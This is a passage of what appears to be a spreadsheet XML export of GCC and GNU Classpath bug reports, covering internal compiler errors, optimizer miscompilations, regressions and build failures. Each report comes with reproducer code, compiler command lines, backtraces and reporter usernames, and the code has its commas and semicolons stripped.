c++ -E -I. -I../include -I/home/shawley/autoconf/bbh_grace/include  -I/usr/local/include  -I/usr/include/mpi  -I/home/shawley/include -DLINUX -DIO_RNPLIO  -DSTDC_HEADERS=1 -DHAVE_STRDUP=1 -DHAVE_ATEXIT=1   -DHAVE_LIBNETCDF=1 -DHAVE_LIBDF=1 -DHAVE_HDF=1 -DHAVE_LIBVS=1 -DHAVE_LIBSV=1 -DHAVE_LIBMPI=1 -DACE_REUSE_GDB -DDEBUG_PRINT -DACE_WRITEBOXES -DDEBUG_PRINT_GD_FILL   ACEDistribution.cpp &gt; ACEDistribution.i
Release:
2.95.4 and  3.0.2 (Debian) (Debian testing/unstable)
Environment:
System: Linux ockham 2.4.9 #7 Thu Sep 13 15:40:55 CEST 2001 i686 unknown
&gt; Architecture: i686&gt;host: i386-pc-linux-gnu
&gt; build: i386-pc-linux-gnu
&gt; target: i386-pc-linux-gnu
&gt;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i386-linux
How-To-Repeat:
c++ -E -I. -I../include -I/home/shawley/autoconf/bbh_grace/include  -I/usr/local/include  -I/usr/include/mpi  -I/home/shawley/include -DLINUX -DIO_RNPLIO  -DSTDC_HEADERS=1 -DHAVE_STRDUP=1 -DHAVE_ATEXIT=1   -DHAVE_LIBNETCDF=1 -DHAVE_LIBDF=1 -DHAVE_HDF=1 -DHAVE_LIBVS=1 -DHAVE_LIBSV=1 -DHAVE_LIBMPI=1 -DACE_REUSE_GDB -DDEBUG_PRINT -DACE_WRITEBOXES -DDEBUG_PRINT_GD_FILL   ACEDistribution.cpp -o ACEDistribution.o</t>
  </si>
  <si>
    <t>shawley</t>
  </si>
  <si>
    <t>GCC-18612</t>
  </si>
  <si>
    <t>Loop optimiser generates incorrect code.</t>
  </si>
  <si>
    <t>When the code below is compiled with -O3 func2() is called on each iteration.
The .s shows that the the comparison to Array has been moved outside of the loop
which is incorrect. If Array is not constant working code is produced working
code is also produced if I use -fold-unroll-loops. If I don't call a function
say simply increment j then correct code is produced too.
The other options used are:
-O3 -m68000 -msoft-float -fno-exceptions
--------------
const unsigned char Array[6] = { 10 10 10 0 0 0 }
void func2(void)
int j=0
void func(void)
{
    unsigned char i
    for(i=0 i&lt;6 i++)
    {
        if(Array[i] &gt; 0)
        {
	    func2()
        }
    }
}
void func2(void)
{
    j++
}
--------------</t>
  </si>
  <si>
    <t>gccbug</t>
  </si>
  <si>
    <t>GCC-53428</t>
  </si>
  <si>
    <t>[4.8 Regression] 403.gcc in SPEC CPU 2006 miscompiled by LTO</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 187678 miscompiled
403.gcc in SPEC CPU 2006 with
-DSPEC_CPU -DNDEBUG -I.  -O2 -ffast-math -fwhole-program -flto=jobserver -fuse-linker-plugin     
I got
166.i:10048: Internal compiler error in simplify_gen_subreg at simplify-rtx.c:2755
Revision 187620 is OK.</t>
  </si>
  <si>
    <t>GCC-3757</t>
  </si>
  <si>
    <t>3.0 does not destroy local objects on throw</t>
  </si>
  <si>
    <t xml:space="preserve">	Local objects are not always destructed when an exception is
	thrown and the object goes out of scope.
Release:
3.0.1 20010720 (prerelease)
Environment:
System: Linux dirham.labs.trema.com 2.4.6 #1 SMP Thu Jul 5 15:25:57 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0-branch/configure --with-gcc-version-trigger=/work/tot/gcc/3.0/gcc-3.0-branch/gcc/version.c --host=i686-pc-linux-gnu --prefix=/usr/local/gcc3 --enable-version-specific-runtime-libs --enable-long-long --enable-threads
How-To-Repeat:
	Please see the following code.  In ex_test the local object
	is not destructed if e1 is thrown but is if e2 would be
	thrown.  No compiler options are needed to reproduce the problem.
$ /usr/local/gcc3/bin/c++ -v ex.cc
Reading specs from /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/specs
Configured with: ../gcc-3.0-branch/configure --with-gcc-version-trigger=/work/tot/gcc/3.0/gcc-3.0-branch/gcc/version.c --host=i686-pc-linux-gnu --prefix=/usr/local/gcc3 --enable-version-specific-runtime-libs --enable-long-long --enable-threads
Thread model: posix
gcc version 3.0.1 20010720 (prerelease)
GNU C++ version 3.0.1 20010720 (prerelease) (i686-pc-linux-gnu)
        compiled by GNU C version 3.0.1 20010720 (prerelease).
#include ... search starts here:
#include  search starts here:
 /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/include/g++
 /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/include/g++/i686-pc-linux-gnu
 /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/include/g++/backward
 /usr/local/include
 /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/include
 /usr/local/gcc3/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 as --traditional-format -V -Qy -o /tmp/ccG2tDMQ.o /tmp/ccVtUJdM.s
GNU assembler version 2.10.91 (i386-redhat-linux) using BFD version 2.10.1.0.2
 /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 /usr/lib/crt1.o /usr/lib/crti.o /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/crtbegin.o -L/usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.1 -L/usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../.. /tmp/ccG2tDMQ.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/local/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/crtend.o /usr/lib/crtn.o
$ ./a.out
a::a()
$ 
#include 
using namespace std
struct a
{
  a () { cerr &lt;&lt; a::a()\n }
  ~a () { cerr &lt;&lt; a::~a()\n }
}
struct e1 {}
struct e2 {}
void
ex_test ()
{
  a aa
  try
    {
      // If this would be e2 aa would be destructed.
      throw e1 ()
    }
  catch (e2 &amp;)
    {
    }
}
int
main ()
{
  try
    {
      ex_test ()
    }
  catch (...)
    {
    }
}</t>
  </si>
  <si>
    <t>rth</t>
  </si>
  <si>
    <t>teemu</t>
  </si>
  <si>
    <t>GCC-7032</t>
  </si>
  <si>
    <t>arm-elf-gcc 3.1 generates wrong DWARF-2 unlike 3.0.4</t>
  </si>
  <si>
    <t>Any executable file built from objects compiled
with -g by arm-elf-gcc 3.1 crashes the ARM Ltd.
debugger AXD when trying to load them.  The same
files compiled with arm-elf-gcc 3.0.4 work perfectly.
If I remove from the executable both sections .debug_info
and .debug_line the file can be loaded without problems
but that is not useful since essential debug information
is stripped.  If any of the two sections is not removed
the AXD debugger crashes with the same uninteligible
error message (DBE Warning 00255: WIN32 exception code 0xc0000005 was caught in dbess_image\dbt_image.cpp:160
even if the message says it is a warning the debugger
becomes unusable and must be closed and restarted).
Release:
3.1
Environment:
Cross-compiler configured for --target=arm-elf
hosted on i686-pc-cygwin.  However it does not seem
likely that the host may have any influence.
How-To-Repeat:
Compile any file with -g option using arm-elf-gcc
3.1 and try to load it with ARM Ltd. AXD debugger.</t>
  </si>
  <si>
    <t>a.bocaniciu</t>
  </si>
  <si>
    <t>GCC-40834</t>
  </si>
  <si>
    <t>[4.5 Regression] Revision 149750 failed 483.xalancbmk in SPEC CPU 2006</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #40799 +++
With revision 149946 on Linux/x86-64 the problem now became
  Running 483.xalancbmk ref base o3 default
483.xalancbmk: copy 0 non-zero return code (exit code=0 signal=11)
It happens with both -O3 -ffast-math and -O2 -ffast-math.</t>
  </si>
  <si>
    <t>GCC-27692</t>
  </si>
  <si>
    <t>FAIL: g++.old-deja/g++.other/init5.C execution test</t>
  </si>
  <si>
    <t>Executing on host: /mnt/gnu/gcc-3.3/objdir/gcc/testsuite/g++/../../g++ -B/mnt/g
nu/gcc-3.3/objdir/gcc/testsuite/g++/../../ /mnt/gnu/gcc-3.3/gcc/gcc/testsuite/g
++.old-deja/g++.other/init5.C  -nostdinc++ -I/mnt/gnu/gcc-3.3/objdir/hppa2.0w-h
p-hpux11.11/libstdc++-v3/include/hppa2.0w-hp-hpux11.11 -I/mnt/gnu/gcc-3.3/objdi
r/hppa2.0w-hp-hpux11.11/libstdc++-v3/include -I/mnt/gnu/gcc-3.3/gcc/libstdc++-v
3/libsupc++ -I/mnt/gnu/gcc-3.3/gcc/libstdc++-v3/include/backward -I/mnt/gnu/gcc
-3.3/gcc/libstdc++-v3/testsuite -fmessage-length=0   -ansi -pedantic-errors -Wn
o-long-long    -L/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.11/./libstdc++-v3/s
rc/.libs  -L/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.11/./libstdc++-v3/src/.l
ibs -L/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.11/./libiberty  -lm   -o ./ini
t5.exe    (timeout = 300)
PASS: g++.old-deja/g++.other/init5.C (test for excess errors)
Setting LD_LIBRARY_PATH to .:/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.11/./li
bstdc++-v3/src/.libs:/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.11/./libstdc++-
v3/src/.libs:/mnt/gnu/gcc-3.3/objdir/gcc:.:/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-
hpux11.11/./libstdc++-v3/src/.libs:/mnt/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.1
1/./libstdc++-v3/src/.libs:/mnt/gnu/gcc-3.3/objdir/gcc
FAIL: g++.old-deja/g++.other/init5.C execution test
# gdb init5.xg
GNU gdb 6.4.50.20060506-cvs
Copyright (C) 2006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hppa2.0w-hp-hpux11.11...
(gdb) r
Starting program: /mnt/gnu/gcc-3.3/objdir/gcc/testsuite/g++/init5.xg
warning: The shared libraries were not privately mapped setting a
breakpoint in a shared library will not work until you rerun the program.
Program received signal SIGABRT Aborted.
0x7afde770 in kill () from /usr/lib/libc.2
(gdb) bt
#0  0x7afde770 in kill () from /usr/lib/libc.2
#1  0x7af78dac in raise () from /usr/lib/libc.2
#2  0x7afba100 in abort_C () from /usr/lib/libc.2
#3  0x7afba15c in abort () from /usr/lib/libc.2
#4  0x0000399c in A::~A() (this=0x400012d0)
    at /mnt/gnu/gcc-3.3/gcc/gcc/testsuite/g++.old-deja/g++.other/init5.C:13
#5  0x000039ec in __tcf_0 ()
    at /mnt/gnu/gcc-3.3/gcc/gcc/testsuite/g++.old-deja/g++.other/init5.C:16
#6  0x7af565b4 in exit () from /usr/lib/libc.2
#7  0x7af15484 in _start () from /usr/lib/libc.2
#8  0x00002030 in $START$ ()</t>
  </si>
  <si>
    <t>GCC-842</t>
  </si>
  <si>
    <t>Internal compiler error for overloaded functions from different base classes</t>
  </si>
  <si>
    <t>/* t.cpp
gcc version 2.95.2 19991024 (release) 
Compile with: g++ t.cpp
t.cpp: In method `C::C()':
t.cpp:34: Internal compiler error.
t.cpp:34: Please submit a full bug report.
Program code:
*/
class A 
{
public:
   bool  f( const A* const char *const A* const char * )
   bool  f( const A* const char *const char * )
   bool  g( const A* const char * ) // Needed for internal error though not used.
}
class B
{
public:
   bool f( A* const char* )
}
class C : public A public B
{
public:
   C()
}
C::C()
{
   f( this  this  )   // Internal compiler error.
}
int main()
{
   C c
   return 0
}
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Linux (Suse 7.0)</t>
  </si>
  <si>
    <t>joachim.eibl</t>
  </si>
  <si>
    <t>GCC-25027</t>
  </si>
  <si>
    <t>[4.2 Regression] libgcov.c:652: ICE: in default_secondary_reload at targhooks.c:529</t>
  </si>
  <si>
    <t>./xgcc -B./ -B/home/dave/opt/gnu/gcc/gcc-4.1.0/hppa-linux/bin/ -isystem /home/da
ve/opt/gnu/gcc/gcc-4.1.0/hppa-linux/include -isystem /home/dave/opt/gnu/gcc/gcc-
4.1.0/hppa-linux/sys-include -L/home/dave/gnu/gcc-4.0/objdir/gcc/../ld -O2  -O2
-g -O2  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-proto
types -Wold-style-definition  -isystem ./include  -fPIC -DELF=1 -DLINUX=1 -g -DH
AVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../gcc/gcc
-I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include
 -DL_gcov_merge_single -c ../../gcc/gcc/libgcov.c -o libgcc/./_gcov_merge_single
.o
../../gcc/gcc/libgcov.c: In function '__gcov_merge_single':
../../gcc/gcc/libgcov.c:652: internal compiler error: in default_secondary_reloa
d at targhooks.c:529
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [libgcc/./_gcov_merge_single.o] Error 1</t>
  </si>
  <si>
    <t>GCC-1029</t>
  </si>
  <si>
    <t>ICE at -O3 in overloaded operator</t>
  </si>
  <si>
    <t>Compiling the following code gives an ICE at -O3:
struct A {}
struct B
{
    B(A
}
struct C
{
    void f(const B
    void g(const B
}
void C::g(const B&amp; b)
{
   A* a
   f(B(*a))
}
B::B(A&amp; a) {}
void operator+(const B&amp; b1 const B&amp; b2)
{
  C c
  A* a
  c.f(B(*a))
}
pbienst@castor:~/tmp &gt; g++ -O3 -c bug.cpp
bug.cpp: In function `void operator+(const B&amp; const B&amp;)':
bug.cpp:26: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
Release:
gcc version 2.97 20001128 (experimental)
Environment:
pbienst@castor:~/tmp &gt; g++ -v
Reading specs from
/home/pbienst/gcc_Exp/bin/../lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc/configure --prefix=/home/pbienst/gcc_Exp/
--enable-languages=f77c++
gcc version 2.97 20001128 (experimental)</t>
  </si>
  <si>
    <t>peter.bienstman</t>
  </si>
  <si>
    <t>CLASSPATH-22828</t>
  </si>
  <si>
    <t>Problem with Frame.setIconImage?</t>
  </si>
  <si>
    <t>I tried running the demo.jar avaliable with the Thinlet download (http://thinlet.sourceforge.net/thinlet-2004-03-07.zip) and got this error:
java.lang.UnsatisfiedLinkError: Failed to locate native function:       gnu/java/awt/peer/gtk/GtkFramePeer.nativeSetIconImageFromData([III)V
   at gnu.java.awt.peer.gtk.GtkFramePeer.setIconImage (GtkFramePeer.java:198)
   at java.awt.Frame.setIconImage (Frame.java:290)
   at thinlet.FrameLauncher. (source file unknown)
   at thinlet.demo.Demo.main (source file unknown)
   at java.lang.reflect.Method.invoke0 (Method.java)
   at java.lang.reflect.Method.invoke (Method.java:255)
   at kaffe.jar.ExecJarName.main (ExecJarName.java:67)
   at kaffe.jar.ExecJar.main (ExecJar.java:75)</t>
  </si>
  <si>
    <t>GCC-34050</t>
  </si>
  <si>
    <t>[4.3 regression] ICE derived classes and variadic templates</t>
  </si>
  <si>
    <t>The following code snippet triggers an ICE on mainline:
===========================================
struct A {}
template struct B : T...
{
  B() : T()... {}
}
B b
===========================================
bug.cc: In constructor 'B::B() [with T = A]':
bug.cc:8:   instantiated from here
bug.cc:5: internal compiler error: tree check: expected tree_list have void_type in tsubst_initializer_list at cp/pt.c:14981
Please submit a full bug report [etc.]
I guess the code is invalid but I'm not sure.</t>
  </si>
  <si>
    <t>dgregor</t>
  </si>
  <si>
    <t>GCC-18685</t>
  </si>
  <si>
    <t>[4.0 Regression] Ada boostrap broken</t>
  </si>
  <si>
    <t>Hi I identified the patch that causes the Ada bootstrap
failure on x86 and x86_64 (at least):
../../xgcc -B../../ -c -g -O2 -fPIC      -W -Wall -gnatpg  s-stratt.adb -o
s-stratt.o
+===========================GNAT BUG DETECTED==============================+
| 4.0.0 20041123 (experimental) (i686-pc-linux-gnu) GCC error:             |
| in gen_lowpart_general at rtlhooks.c:58                                 |
| Error detected at s-stratt.adb:671:1                                     |
works: cvs up -D 2004/11/24 00:06:17 UTC
breaks: cvs up -D 2004/11/24 00:10:17 UTC
date: 2004/11/24 00:08:17  author: rth  state: Exp  lines: +11 -0
        * rtl.h (validate_subreg): Declare.
        * emit-rtl.c (validate_subreg): New.
        (gen_rtx_SUBREG): Use it.
        * simplify-rtx.c (simplify_subreg): Likewise.
        (simplify_gen_subreg): Likewise.  Remove duplicate asserts.
        * expr.c (emit_move_insn_1): Tidy complex move code.  Use memory
        fallback whenever gen_realpart/gen_imagpart would not be able to
        create SUBREGs.</t>
  </si>
  <si>
    <t>laurent</t>
  </si>
  <si>
    <t>GCC-29668</t>
  </si>
  <si>
    <t>[4.3 Regression] make error</t>
  </si>
  <si>
    <t>My platform is: CYGWIN_NT-5.1 1.5.21(0.156/4/2) 2006-07-30
  And I plan to keep tracking 4.3 through its development phase and possible help that it can also be used by other cygwin users.
  I downloaded gcc-core-4.3-20061028 the the c++ objc and java components.
  Configured with: 
   ../configure --enable-shared --disable-nls --enable-languages=cc++objcjava
   Result: Successfull
   # Then
   make
   Result:  Error  (pasted below)
---------- start paste content below:
gcc -c   -g -fkeep-inline-functions -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -fno-common   -DHAVE_CONFIG_H -I. -I. -I../../gcc -I../../gcc/. -I../../gcc/../include -I..
/../gcc/../libcpp/include  -I../../gcc/../libdecnumber -I../libdecnumber    ../../gcc/dwarf2out.c -o dwarf2out.o
../../gcc/dwarf2out.c: In function `file_name_acquire':
../../gcc/dwarf2out.c:7672: error: `files' undeclared (first use in this function)
../../gcc/dwarf2out.c:7672: error: (Each undeclared identifier is reported only once
../../gcc/dwarf2out.c:7672: error: for each function it appears in.)
../../gcc/dwarf2out.c:7672: error: `i' undeclared (first use in this function)
make[3]: *** [dwarf2out.o] Error 1
make[3]: Leaving directory `/usr/src/gcc/gcc-4.3-20061028/objdir/gcc'
make[2]: *** [all-stage1-gcc] Error 2
---------------- end of paste
Do you have any idea of what might be causing these symbols to be undeclared?
Ordering of the command arguments?
Thanks
  Darel Henman</t>
  </si>
  <si>
    <t>dhenman</t>
  </si>
  <si>
    <t>GCC-13116</t>
  </si>
  <si>
    <t>optimization issue</t>
  </si>
  <si>
    <t>Code snippet below gives wrong result when compiled with -O1-O2 or -O3
Unoptimized it works fine.
int main()
{
  unsigned int x = 0x21
  if(!(x &amp; 0x04) &amp;&amp; !(x &amp; 0x20))  ------&gt; this shoud always evaluate to false
  {
    printf(we should not be here!!!! \n)
  }
  return 0
}
Output of gcc -v is :
Reading specs from /opt/cross/lib/gcc-lib/powerpc64-linux/3.2/specs
Configured with: /usr/src/packages/BUILD/cross-ppc64-gcc-3.2/gcc-3.2/configure
--enable-languages=cc++f77 --prefix=/opt/cross --host=powerpc-suse-linux
--target=powerpc64-linux --enable-threads=posix --disable-nls --enable-shared
--with-headers=/usr/src/packages/BUILD/cross-ppc64-gcc-3.2/include-ppc64-glibc-2.2.5
Thread model: posix
gcc version 3.2</t>
  </si>
  <si>
    <t>mkumar_70</t>
  </si>
  <si>
    <t>GCC-7200</t>
  </si>
  <si>
    <t>Can't compile XFree86-4.2.0 with gcc 3.1</t>
  </si>
  <si>
    <t>When I am trying to compile XFree86-4.2.0 on FreeBSD 5.0-CURRENT system
with gcc 3.1 base system compiler I am getting the following error
message:
rm -f translate.o
LD_LIBRARY_PATH=../../../../exports/lib cc -c -pipe -O -mpreferred-stack-boundar
y=2 -march=pentium-mmx  -ansi -pedantic -Dasm=__asm -Wall -Wpointer-arith   -I..
/../../../exports/include -I../../../../exports/include/X11 -I../../../../includ
e/extensions            -I../../../../extras/Mesa/src -I../../../../lib/GL/dri
-I../../../.. -I../../../../exports/include   -DCSRG_BASED  -DFUNCPROTO=15 -DNAR
ROWPROTO -DXTHREADS   -DXUSE_MTSAFE_API -DXNO_MTSAFE_PWDAPI    -DMALLOC_0_RETURN
S_NULL -DGLXEXT -DXF86DRI -DGLX_DIRECT_RENDERING -DGLX_USE_DLOPEN -DGLX_USE_MESA
		-DUSE_X86_ASM -DUSE_MMX_ASM       -ansi -pedantic -Dasm=__asm -W
all -Wpointer-arith  -I../../../../exports/include -I../../../../exports/include
/X11 -I../../../../include/extensions           -I../../../../extras/Mesa/src -I
../../../../lib/GL/dri  -I../../../.. -I../../../../exports/include   -DCSRG_BAS
ED  -DFUNCPROTO=15 -DNARROWPROTO -DXTHREADS   -DXUSE_MTSAFE_API -DXNO_MTSAFE_PWD
API    -DMALLOC_0_RETURNS_NULL -DGLXEXT -DXF86DRI -DGLX_DIRECT_RENDERING -DGLX_U
SE_DLOPEN -DGLX_USE_MESA                -DUSE_X86_ASM -DUSE_MMX_ASM        -fPIC
 translate.c
In file included from translate.c:779:
../../../../extras/Mesa/src/trans_tmp.h: In function `trans_1_GLdouble_1ub_elt':
../../../../extras/Mesa/src/trans_tmp.h:124: could not find a spill register
(insn 96 94 97 (set (subreg:SF (reg:QI 75) 0)
	(plus:SF (reg:SF 8 st(0) [76])
	    (reg:SF 9 st(1) [80]))) 525 {*fop_sf_comm_nosse} (insn_list 87 (nil)
)
    (expr_list:REG_DEAD (reg:SF 8 st(0) [76])
	(nil)))
../../../../extras/Mesa/src/trans_tmp.h:124: Internal compiler error in failed_r
eload at reload1.c:5050
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
*** Error code 1
Stop in /tmp/portbuild/usr/ports/x11-servers/XFree86-4-Server/work/xc/lib/GL/mes
a/src.
*** Error code 1
Pre-processed translate.c is attached the bug could be triggered as follows:
$ cc -c -O -fPIC translate.i
In file included from translate.c:779:
../../../../extras/Mesa/src/trans_tmp.h: In function `trans_1_GLdouble_1ub_elt':
../../../../extras/Mesa/src/trans_tmp.h:124: could not find a spill register
(insn 96 94 97 (set (subreg:SF (reg:QI 75) 0)
	(plus:SF (reg:SF 8 st(0) [76])
	    (reg:SF 9 st(1) [80]))) 525 {*fop_sf_comm_nosse} (insn_list 87 (nil)
)
    (expr_list:REG_DEAD (reg:SF 8 st(0) [76])
	(nil)))
../../../../extras/Mesa/src/trans_tmp.h:124: Internal compiler error in failed_r
eload at reload1.c:5050
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc (GCC) 3.1 [FreeBSD] 20020509 (prerelease)
Environment:
$ uname -a
FreeBSD notebook 5.0-CURRENT FreeBSD 5.0-CURRENT #43: Fri Jun 28 14:12:22 EEST 2
002     root@notebook:/usr/src/sys/i386/compile/NOTEBOOK  i386
How-To-Repeat:
$ cc -c -O -fPIC translate.i</t>
  </si>
  <si>
    <t>sobomax</t>
  </si>
  <si>
    <t>GCC-23959</t>
  </si>
  <si>
    <t>[4.0 Regression] -Wswitch-default reports missing default in a template that has one</t>
  </si>
  <si>
    <t>-Wswitch default warning flag is producing a warning message saying that a
template does not have a default case even though it does.
GCC version specs:
Using built-in specs.
Target: i386-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --enable-shared --enable-threads=posix
--enable-checking=release --with-system-zlib --enable-__cxa_atexit
--disable-libunwind-exceptions --enable-libgcj-multifile
--enable-languages=cc++objcjavaf95ada --enable-java-awt=gtk
--with-java-home=/usr/lib/jvm/java-1.4.2-gcj-1.4.2.0/jre --host=i386-redhat-linux
Thread model: posix
gcc version 4.0.1 20050727 (Red Hat 4.0.1-5)
Installed via RPM package from Fedora Core 4
Command line: g++ -o test test.c -Wswitch-default -Wall --pedantic
Compiler output:
test.c: In function 'void foo(ArrayType*)':
test.c:12: warning: switch missing default case
Detailed output:
g++ -v -save-temps -Wswitch-default -Wall --pedantic -o test test.c
Using built-in specs.
Target: i386-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --enable-shared --enable-threads=posix
--enable-checking=release --with-system-zlib --enable-__cxa_atexit
--disable-libunwind-exceptions --enable-libgcj-multifile
--enable-languages=cc++objcjavaf95ada --enable-java-awt=gtk
--with-java-home=/usr/lib/jvm/java-1.4.2-gcj-1.4.2.0/jre --host=i386-redhat-linux
Thread model: posix
gcc version 4.0.1 20050727 (Red Hat 4.0.1-5)
 /usr/libexec/gcc/i386-redhat-linux/4.0.1/cc1plus -E -quiet -v -D_GNU_SOURCE
test.c -Wswitch-default -Wall -pedantic -fpch-preprocess -o test.ii
ignoring nonexistent directory
/usr/lib/gcc/i386-redhat-linux/4.0.1/../../../../i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/i386-redhat-linux/4.0.1/../../../../include/c++/4.0.1
 /usr/lib/gcc/i386-redhat-linux/4.0.1/../../../../include/c++/4.0.1/i386-redhat-linux
 /usr/lib/gcc/i386-redhat-linux/4.0.1/../../../../include/c++/4.0.1/backward
 /usr/local/include
 /usr/lib/gcc/i386-redhat-linux/4.0.1/include
 /usr/include
End of search list.
 /usr/libexec/gcc/i386-redhat-linux/4.0.1/cc1plus -fpreprocessed test.ii -quiet
-dumpbase test.c -auxbase test -Wswitch-default -Wall -pedantic -version -o test.s
GNU C++ version 4.0.1 20050727 (Red Hat 4.0.1-5) (i386-redhat-linux)
        compiled by GNU C version 4.0.1 20050727 (Red Hat 4.0.1-5).
GGC heuristics: --param ggc-min-expand=81 --param ggc-min-heapsize=96921
test.c: In function 'void foo(ArrayType*)':
test.c:12: warning: switch missing default case
 as -V -Qy -o test.o test.s
GNU assembler version 2.15.94.0.2.2 (i386-redhat-linux) using BFD version
2.15.94.0.2.2 20041220
 /usr/libexec/gcc/i386-redhat-linux/4.0.1/collect2 --eh-frame-hdr -m elf_i386
-dynamic-linker /lib/ld-linux.so.2 -o test
/usr/lib/gcc/i386-redhat-linux/4.0.1/../../../crt1.o
/usr/lib/gcc/i386-redhat-linux/4.0.1/../../../crti.o
/usr/lib/gcc/i386-redhat-linux/4.0.1/crtbegin.o
-L/usr/lib/gcc/i386-redhat-linux/4.0.1 -L/usr/lib/gcc/i386-redhat-linux/4.0.1
-L/usr/lib/gcc/i386-redhat-linux/4.0.1/../../.. test.o -lstdc++ -lm -lgcc_s
-lgcc -lc -lgcc_s -lgcc /usr/lib/gcc/i386-redhat-linux/4.0.1/crtend.o
/usr/lib/gcc/i386-redhat-linux/4.0.1/../../../crtn.o
Testcase code:
#include 
using namespace std
template 
void foo( ArrayType * arr )
{
    int i = 0
    for (  )
    {
        switch ( arr[i] )
        {
            default:
                cout &lt;&lt; arr[i] &lt;&lt; endl
                break
            case 1:
            case 2:
            case 3:
            case 4:
            case 5:
            case 6:
            case 7:
            case 8:
            case 9:
                cout &lt;&lt; woot &lt;&lt; endl
                continue
        }
        i++
    }
}
int main()
{
    int arr[10] = {12345678910}
    foo(arr)
    return 0
}</t>
  </si>
  <si>
    <t>rlibiez</t>
  </si>
  <si>
    <t>GCC-59641</t>
  </si>
  <si>
    <t>ICE with invalid expression in vector arithmetic</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++11)
triggers an ICE since GCC 4.8.0:
======================================================
typedef int T __attribute__((vector_size(8)))
T foo(const T&amp; a const T&amp; b)
{
  constexpr T c = a &lt; b
  return c ? a : b
}
======================================================
bug.cc: In function 'T foo(const T&amp; const T&amp;)':
bug.cc:5:23: error: 'a' is not a constant expression
   constexpr T c = a &lt; b
                       ^
bug.cc:6:18: internal compiler error: tree check: expected vector_type have error_mark in build_conditional_expr_1 at cp/call.c:4495
   return c ? a : b
                  ^
0xd8f084 tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc/gcc/tree.c:9192
0x58441c tree_check
        ../../gcc/gcc/tree.h:2707
0x58441c build_conditional_expr_1
        ../../gcc/gcc/cp/call.c:4495
0x5844bc build_conditional_expr(unsigned int tree_node* tree_node* tree_node* int)
        ../../gcc/gcc/cp/call.c:4931
0x6a8e53 build_x_conditional_expr(unsigned int tree_node* tree_node* tree_node* int)
        ../../gcc/gcc/cp/typeck.c:6017
0x682b2c cp_parser_question_colon_clause
        ../../gcc/gcc/cp/parser.c:8080
0x682b2c cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8116
0x6847b4 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8274
0x67af3a cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8313
0x67af3a cp_parser_jump_statement
        ../../gcc/gcc/cp/parser.c:10677
0x67af3a cp_parser_statement
        ../../gcc/gcc/cp/parser.c:9370
0x67b5c9 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:9740
0x67b73e cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:9694
0x68f15b cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:18610
0x68f15b cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:18646
0x6934fe cp_parser_function_definition_after_declarator
        ../../gcc/gcc/cp/parser.c:22678
0x694394 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/gcc/cp/parser.c:22590
0x694394 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16588
0x69562f cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11200
0x679003 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:11081
Please submit a full bug report [etc.]
Marc vector arithmetic looks like your domain would you mind having a look?</t>
  </si>
  <si>
    <t>GCC-28265</t>
  </si>
  <si>
    <t>iconv-related errors while building a cross-compiler for MinGW</t>
  </si>
  <si>
    <t>libstdc++-v3/include/ext/codecvt_specializations.h uses iconv_t and causes errors while building an i686-pc-linux-gnu to i686-pc-mingw32 cross-compiler. 
(I'm at trunk revision 115196.)
Strangely however this does not cause a build failure and is therefore not catastrophic for this target.
GCC was configured as:
